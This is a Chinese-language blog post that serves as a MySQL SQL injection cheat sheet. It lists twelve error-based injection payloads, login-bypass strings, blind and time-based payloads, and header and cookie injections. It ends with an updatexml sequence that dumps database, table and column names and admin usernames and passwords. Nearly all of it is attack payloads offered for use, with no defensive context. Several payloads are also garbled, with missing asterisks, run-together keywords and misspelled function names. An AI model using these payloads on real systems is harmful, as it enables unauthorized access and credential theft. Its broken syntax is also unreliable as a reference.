12種報(bào)錯(cuò)注入+萬(wàn)能語(yǔ)句

1、通過(guò)floor報(bào)錯(cuò),注入語(yǔ)句如下:
and select 1 from (select count(),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a);

2、通過(guò)ExtractValue報(bào)錯(cuò),注入語(yǔ)句如下:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

3、通過(guò)UpdateXml報(bào)錯(cuò),注入語(yǔ)句如下:
and 1=(updatexml(1,concat(0x3a,(select user())),1))

4、通過(guò)NAME_CONST報(bào)錯(cuò),注入語(yǔ)句如下:
and exists(selectfrom (selectfrom(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)

5、通過(guò)join報(bào)錯(cuò),注入語(yǔ)句如下:
select * from(select * from mysql.user ajoin mysql.user b)c;

6、通過(guò)exp報(bào)錯(cuò),注入語(yǔ)句如下:
and exp(~(select * from (select user () ) a) );

7、通過(guò)GeometryCollection()報(bào)錯(cuò),注入語(yǔ)句如下:
and GeometryCollection(()select *from(select user () )a)b );

8、通過(guò)polygon ()報(bào)錯(cuò),注入語(yǔ)句如下:
and polygon (()select * from(select user ())a)b );

9、通過(guò)multipoint ()報(bào)錯(cuò),注入語(yǔ)句如下:
and multipoint (()select * from(select user() )a)b );

10、通過(guò)multlinestring ()報(bào)錯(cuò),注入語(yǔ)句如下:
and multlinestring (()select * from(selectuser () )a)b );

11、通過(guò)multpolygon ()報(bào)錯(cuò),注入語(yǔ)句如下:
and multpolygon (()select * from(selectuser () )a)b );

12、通過(guò)linestring ()報(bào)錯(cuò),注入語(yǔ)句如下:
and linestring (()select * from(select user() )a)b );

關(guān)于POST注入

常用的萬(wàn)能username語(yǔ)句:
a ’ or 1=1 #
a ") or 1=1 #
a‘) or 1=1 #
a” or “1”=”1
' or '1'='1
' or (length(database())) = 8 (用于輸入’ “都沒(méi)有錯(cuò)誤)
' or (ascii(substr((select database()) ,1,1))) = 115 # (用于輸入’ “都沒(méi)有錯(cuò)誤)
") or ("1")=("1
") or 1=1 or if(1=1, sleep(1), null) #
") or (length(database())) = 8 #
") or (ascii(substr((select database()) ,1,1))) = 115 or if(1=1, sleep(1), null) #

post型盲注通殺payload:

uname=admin%df'or()or%200%23&passwd=&submit=Submit

關(guān)于UPDATEXML,REFERER,COOKIE的構(gòu)造

User-Agent:.........' or updatexml(1,concat(0x7e,database(),0x7e),1),”,”) #
Referer: ’ or updatexml(1,concat(0x7e,database(),0x7e),1),”,”) #
Cookie:username: admin ’ or updatexml(1,concat(0x7e,database(),0x7e),1) #

updatexml報(bào)錯(cuò)注入

爆數(shù)據(jù)庫(kù)版本信息:?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
鏈接用戶:?id=1 and updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)
鏈接數(shù)據(jù)庫(kù):?id=1 and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)
爆庫(kù):?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select schema_name),0x7e) FROM admin limit 0,1),0x7e),1)
爆表:?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select table_name),0x7e) FROM admin limit 0,1),0x7e),1)
爆字段:?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select column_name),0x7e) FROM admin limit 0,1),0x7e),1)
爆字段內(nèi)容:?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容